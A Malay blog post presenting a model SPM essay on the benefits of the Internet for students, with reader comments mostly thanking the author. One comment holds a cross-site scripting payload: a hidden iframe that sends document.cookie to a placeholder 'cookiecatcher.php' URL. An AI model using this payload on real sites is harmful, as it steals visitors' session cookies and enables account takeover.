Karangan SPM - Kebaikan Internet terhadap Murid

Anak-anak muda masa kini dikatakan sebagai digital natives oleh sebab mereka dilahirkan dan dibesarkan pada zaman Revolusi 4.0. Justeru, anak-anak muda terdedah dengan perkembangan teknologi maklumat terutamanya penggunaan Internet dalam kehidupan seharian. Oleh hal demikian, golongan ini memperoleh banyak manfaat daripada penggunaan Internet. Namun begitu, familiariti mereka dalam hal ini tidak bermaksud mereka terhindar daripada kesan negatif penggunaan Internet. Situasi ini tidak mendukung maksud golongan muda harus dipisahkan dengan arus pemodenan ini seperti kata Sayidina Umar Al-Khattab, “Didiklah anakmu mengikut zamannya, kerana zamannya adalah berbeza sekali dengan zaman ibu bapa”.
          Internet merupakan rangkaian maklumat antarabangsa yang terbesar di dunia yang memberikan kebaikan kepada semua peringkat dalam pendidikan, ekonomi, sosial, dan lain-lain termasuklah golongan murid. Kajian Pengguna Internet MCMC 2016 golongan yang masih bersekolah menghabiskan paling banyak masa dalam talian, iaitu sebanyak 20.9 jam seminggu. Kemudahan ini membenarkan murid saling bertukar maklumat dan pengetahuan kerana wujudnya ‘Dunia Tanpa Sempadan’. Sudah terang lagi bersuluh, kebaikan Internet terhadap murid adalah seperti membantu mencari maklumat. Murid yang melayari Internet dapat mencari banyak maklumat tambahan yang terkini untuk menyiapkan tugasan yang diberikan oleh guru. Murid yang luas pengetahuan tidak akan menjadi seperti katak di bawah tempurung. Sekiranya murid berpengetahuan luas dan berdaya intelektual, negara kita akan mencapai kemajuan setanding dengan negara lain seperti Jepun, Korea dan Amerika Syarikat.
          Sebagai individu yang suka berkomunikasi, murid juga dapat menambah kenalan sehingga hujung dunia. Media sosial telah menjadi medan penting dalam kalangan murid untuk mengenal budaya dan tradisi bangsa atau negara lain. Menerusi Facebook, Twitter, dan Instagram, murid dapat saling bertukar maklumat mahupun pendapat melalui kenalan daripada laman sosial. Hal ini demikian kerana maslahat Internet kepada remaja ialah mereka dapat mempelajari adat resam sesuatu bangsa daripada negara yang berbeza. Hal ini bertepatan dengan ungkapan ‘tak kenal maka tak cinta’.
          Malah, murid dapat mengeratkan hubungan silaturahim apabila melayari Internet. Penggunaan Facebook, Instagram, dan Twitter juga boleh digunakan sebagai medium untuk mencari rakan lama yang terpisah dan kembali berhubung semula dengan mereka serta menyimpul mati silaturahim. Malah, murid yang tinggal di sekolah berasrama mampu berhubung dengan keluarga dan tidak menjadikan jarak beribu batu sebagai alasan untuk merenggangkan hubungan yang sudah kukuh bagai isi dengan kuku. Perkembangan teknologi ini telah menjadi jambatan untuk mengeratkan hubungan kekeluargaan.
          Tuntasnya, Internet mampu membawa kepada kebaikan kepada pengguna jika digunakan secara betul. Namun, penggunaan Internet secara tidak terkawal memberikan seribu satu implikasi negatif. Oleh itu, ibu bapa ibarat kunci yang mengawal penggunaan Internet. Ibu bapa hendaklah mengehadkan masa melayari Internet. Komputer hendaklah diletakkan di ruang keluarga untuk memudahkan pemantauan di samping memasang aplikasi dalam usaha menyekat akses kepada laman sesawang yang tidak bermanfaat. Malah, murid juga tidak mendedahkan maklumat diri dengan sewenang-wenangnya kerana kadar jenayah di Internet telah meningkat sejak akhir-akhir ini.

Comments

  1. Thanks, karangan yg sgt membantu

    ReplyDelete
  2. So cool..mmg krgn gred A la..thnk u sbb krngn ni my work was donee!!!😄😄love itt

    ReplyDelete
  3. Replies
    1. Maslahat ialah perkataan bahasa Arab bermaksud sesuatu yg berguna/ manfaat/ faedah.

      Delete
  4. Karangn ini bagus tetapi ini krngn sk ke....mcm pendek sikit...maaf...tapi bagus...

    ReplyDelete
    Replies
    1. Terima kasih. Karangan SK bilangan patah perkataan untuk bahagian B adalah antara 50 hingga 80 patah perkataan. Manakala bahagian C antara 80 hingga 120 patah perkataan. Karangan ini mungkin sesuai untuk murid PT3 (Kertas 2, Bahagian B), dan murid SPM (Kertas 1, Bahagian A). Apa-apapun, semoga ada isi yg bermanfaat utk kegunaan saudara/ saudari.

      Delete
    2. ajar bt karangan best ii ha

      Delete
    3. Sure. lets do it together. But how may I help you... 😅

      Delete
  5. Thanks for information 🥰🥰

    ReplyDelete
  6. wow thanks for the karangan sesuai untuk buat rujukan...thank you


    from HWANG YU-JIN

    ReplyDelete
  7. nak tanya kenapa dekat blog saya belum ada iklan. saya dah register adsense haritu dah nak masuk 2 bulan....

    ReplyDelete
  8. karangan yang mantao dan jitu. Terima kasih




    ReplyDelete
  9. terbaik lahh... ni mesti pelajar cemerlang

    ReplyDelete
  10. Karangan yang bagus...saya boleh siapkan homework

    ReplyDelete
  11. <...iframe... frameborder= 0 height=0 width=0 src=javascript...:void(document.location=”YOURURL/cookiecatcher.php?c=”+document.cookie)><.../iframe>

    ReplyDelete
  12. Mohon untuk copy ya. Buat keje SEKOLAH bm

    ReplyDelete
  13. Wow i really love it it gaves me more idea😍

    ReplyDelete
  14. bagus baaa ni karangan ,cepat difaham ,mudah" lulus SPM tahun ni😇😇

    ReplyDelete
  15. terima kasih atas perkongsian ... sangat membantu dalam penulisan karangan ..

    ReplyDelete

Post a Comment

Popular posts from this blog

Nilai dan Pengajaran dalam Novel Leftenan Adnan Wira Bangsa

Karangan PT3: Karangan Pemerihalan/ Pengalaman/ Cereka

Karangan SPM - Kepentingan Mempertahankan Permainan Tradisional